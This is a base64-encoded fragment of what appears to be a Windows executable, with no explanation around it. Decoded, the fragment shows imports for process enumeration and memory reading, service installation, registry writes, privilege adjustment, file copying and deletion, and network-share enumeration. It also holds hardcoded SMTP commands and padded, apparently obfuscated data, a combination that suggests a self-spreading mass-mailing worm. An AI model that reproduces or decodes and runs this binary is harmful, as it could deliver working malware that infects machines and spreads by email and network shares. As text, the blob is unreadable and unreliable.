AAAa3gAACt4AAAAAAAA0AACAAwAAgHQAAIAQAACAEwAAgAkAAIAEAACAbwAA
gHMAAIAXAACAAAAAALQARnJlZUxpYnJhcnkAPgFHZXRQcm9jQWRkcmVzcwAA
wgFMb2FkTGlicmFyeUEAABsAQ2xvc2VIYW5kbGUAlgJTbGVlcACeAlRlcm1p
bmF0ZVByb2Nlc3MAABwCUmVhZFByb2Nlc3NNZW1vcnkA7wFPcGVuUHJvY2Vz
cwDZAU1vZHVsZTMyRmlyc3QATABDcmVhdGVUb29saGVscDMyU25hcHNob3QA
ACQBR2V0TW9kdWxlRmlsZU5hbWVBAAD+AVByb2Nlc3MzMk5leHQA/AFQcm9j
ZXNzMzJGaXJzdAAA1gFNYXBWaWV3T2ZGaWxlADUAQ3JlYXRlRmlsZU1hcHBp
bmdBAAASAUdldEZpbGVTaXplADQAQ3JlYXRlRmlsZUEAsAJVbm1hcFZpZXdP
ZkZpbGUAGwFHZXRMb2NhbFRpbWUAABoBR2V0TGFzdEVycm9yAADMAUxvY2Fs
RnJlZQDIAUxvY2FsQWxsb2MAAPgAR2V0Q3VycmVudFByb2Nlc3NJZADSAldp
ZGVDaGFyVG9NdWx0aUJ5dGUA5AFNdWx0aUJ5dGVUb1dpZGVDaGFyAM4AR2V0
Q29tcHV0ZXJOYW1lQQAAKABDb3B5RmlsZUEAuQFJc0RCQ1NMZWFkQnl0ZQAA
3wJXcml0ZUZpbGUAGAJSZWFkRmlsZQAAYwFHZXRUZW1wRmlsZU5hbWVBAABl
AUdldFRlbXBQYXRoQQAAVwBEZWxldGVGaWxlQQBoAlNldEZpbGVBdHRyaWJ1
dGVzQQAAkABGaW5kQ2xvc2UAnQBGaW5kTmV4dEZpbGVBAJQARmluZEZpcnN0
RmlsZUEAAGECU2V0RW5kT2ZGaWxlAABqAlNldEZpbGVQb2ludGVyAAAUAUdl
dEZpbGVUaW1lAGwCU2V0RmlsZVRpbWUAbQFHZXRUaWNrQ291bnQAAEQAQ3Jl
YXRlUHJvY2Vzc0EAAFkBR2V0U3lzdGVtRGlyZWN0b3J5QQD3AEdldEN1cnJl
bnRQcm9jZXNzAJsCU3lzdGVtVGltZVRvRmlsZVRpbWUAAF0BR2V0U3lzdGVt
VGltZQB1AUdldFZlcnNpb25FeEEAdAFHZXRWZXJzaW9uAADOAldhaXRGb3JT
aW5nbGVPYmplY3QAygBHZXRDb21tYW5kTGluZUEAgABFeHBhbmRFbnZpcm9u
bWVudFN0cmluZ3NBAAQBR2V0RHJpdmVUeXBlQQBKAENyZWF0ZVRocmVhZAAA
S0VSTkVMMzIuZGxsAABbAVJlZ0Nsb3NlS2V5AGYBUmVnRW51bUtleUEAcQFS
ZWdPcGVuS2V5QQBkAVJlZ0RlbGV0ZVZhbHVlQQBqAVJlZ0VudW1WYWx1ZUEA
NABDbG9zZVNlcnZpY2VIYW5kbGUAAEwAQ3JlYXRlU2VydmljZUEAAEUBT3Bl
blNDTWFuYWdlckEAALMBU3RhcnRTZXJ2aWNlQ3RybERpc3BhdGNoZXJBAK4B
U2V0U2VydmljZVN0YXR1cwAARwFPcGVuU2VydmljZUEAAI4BUmVnaXN0ZXJT
ZXJ2aWNlQ3RybEhhbmRsZXJBAJ0ARnJlZVNpZACYAEVxdWFsU2lkAAAYAEFs
bG9jYXRlQW5kSW5pdGlhbGl6ZVNpZAAA0ABHZXRUb2tlbkluZm9ybWF0aW9u
AEIBT3BlblByb2Nlc3NUb2tlbgAAXAFSZWdDb25uZWN0UmVnaXN0cnlBALIB
U3RhcnRTZXJ2aWNlQQB7AVJlZ1F1ZXJ5VmFsdWVFeEEAAIYBUmVnU2V0VmFs
dWVFeEEAAF4BUmVnQ3JlYXRlS2V5QQAXAEFkanVzdFRva2VuUHJpdmlsZWdl
cwD1AExvb2t1cFByaXZpbGVnZVZhbHVlQQBBRFZBUEkzMi5kbGwAAFdTMl8z
Mi5kbGwAABEAV05ldENsb3NlRW51bQAcAFdOZXRFbnVtUmVzb3VyY2VBAEAA
V05ldE9wZW5FbnVtQQBNUFIuZGxsACYBR2V0TW9kdWxlSGFuZGxlQQAAUAFH
ZXRTdGFydHVwSW5mb0EAfQBFeGl0UHJvY2VzcwC/AEdldENQSW5mbwC5AEdl
dEFDUAAAMQFHZXRPRU1DUAAAvwFMQ01hcFN0cmluZ0EAAMABTENNYXBTdHJp
bmdXAACfAUhlYXBGcmVlAACZAUhlYXBBbGxvYwCtAlVuaGFuZGxlZEV4Y2Vw
dGlvbkZpbHRlcgAAsgBGcmVlRW52aXJvbm1lbnRTdHJpbmdzQQCzAEZyZWVF
bnZpcm9ubWVudFN0cmluZ3NXAAYBR2V0RW52aXJvbm1lbnRTdHJpbmdzAAgB
R2V0RW52aXJvbm1lbnRTdHJpbmdzVwAAbQJTZXRIYW5kbGVDb3VudAAAUgFH
ZXRTdGRIYW5kbGUAABUBR2V0RmlsZVR5cGUAnQFIZWFwRGVzdHJveQCbAUhl
YXBDcmVhdGUAAL8CVmlydHVhbEZyZWUALwJSdGxVbndpbmQAUwFHZXRTdHJp
bmdUeXBlQQAAVgFHZXRTdHJpbmdUeXBlVwAAuwJWaXJ0dWFsQWxsb2MAAKIB
SGVhcFJlQWxsb2MAfAJTZXRTdGRIYW5kbGUAAKoARmx1c2hGaWxlQnVmZmVy
cwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAW4lAAG+zQAAAAAAAAAAAABS0
QAAAAAAAAAAAAAAAAAAAAAAAMw1BAEAAAAAgAAAALAAAAC0tAABcAAAAUVVJ
VA0KAAANCi4NCgAAAERBVEEgDQoASEVMTyAlcw0KAAAAPg0KAE1BSUwgRlJP
TTogPAAAAABSQ1BUIFRPOjwAAAAlZAAAIAkNCgAAAAAuLCgpJSRAIWB+IAAt
XwAALi4AAC4AAABcKi4qAAAAAFxcAAAAAAAAiRV37zMZmXgQWLjJ8pkAAAeC
ClibmpqaorY1tTE3NbUxlTM1NIK+ODK1vjgytaKbGjO1lTM1NIIytJ4eorkw
uza/NbWVtTC4grM2u7CisDaxMjOVMzU0gjYyN6K2NbUxNzW1MZUzNTSCPjU4
NDCitjW1MTc1tTGVMzU0grg1NKI5Mja2MrUxlTM1NJW2N4I4sLOiuTC7Nr81
tZW1MLiCOzY7orY1tTE3NbUxlTM1NIK4MrOzMKKwNrEyM5UzNTSCszg7tqK5
MLs2vzW1lbUwuII0ODcyojmzFLcyujK1lTM1lbe6grg1Nz41ojmzFLcyujK1
lTM1lbe6grAwuTC0NbqisTY7MzWwMrgylTM1NJWzu4KCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgp+sIqsqKCapJSuSoCCSqqslIasiJCIrrCKrKigmqSUrkiMlJCilK6wr
LiQipaggI5IrpiKrIKCspSQiJqWVNjS6grQwlTCzOYKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKC
goKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoKCgoI0up6ClTC+
MIKVOzO7gpW6NrGClbMyuIKCgoKCgoKCgoKCgoKVuL64gpW2uDSClba4NLSC
lTkys4KVMju6gpWwNTOClbu4sYKVvrQ7gpW3ujGClTO6uoKVM4KVujI7gpU0
ujGClTS6MDGClbMyN4KVNLobgpW6sLGCgis1sbg5MrswrCQ2M7s1OzWxuKwp
NrWwNTk7rCM4u7swtbipMLs7NjW1rIIiurqSqjK4tjuCqzi1gqs4tSW1MzCC
Kz47uDA0rCM4u7swtbgjNbW4uzW0KzC4rCswu7k2MzA7gis1sbg5MrswrCQ2
M7s1OzWxuKwpIqOsKSKjmKwpMrOSoTa0MJKlMjQwgqs4tSswu7k2MzA7gia1
uDC7tTC4kiswuLg2tTE7rCMyM7YwrKoyuLY7goKCgoKCgoKmNpSCpjC0tDWU
gqswn4KhOZ+CKLWwMLQ2uTC7MrO0MJI0Mja0FBSTEDuTgqswuDi7tTCwkjQy
NrQUFJMQO5OCgoKCgjKSEDuSEDuSMTI0MIIykhA7khA7krg1NbSCMpIQO5IQ
O5I5MLM7NrgwgjKSEDuSEDuSujK4M7aCEDuSuzA0NbkytJK4NTW0O4KCgoKC
goKCtTA5grE4tbU+grU2MzCCtjg0NTi7gjC+Mza4MIIxNTWwgro1ObE4tIIp
NrWuqoImIJKZlZqCKRublSC0NzC7tZKCKRublSe0ML+VIIKCtjU5kjK7MJI+
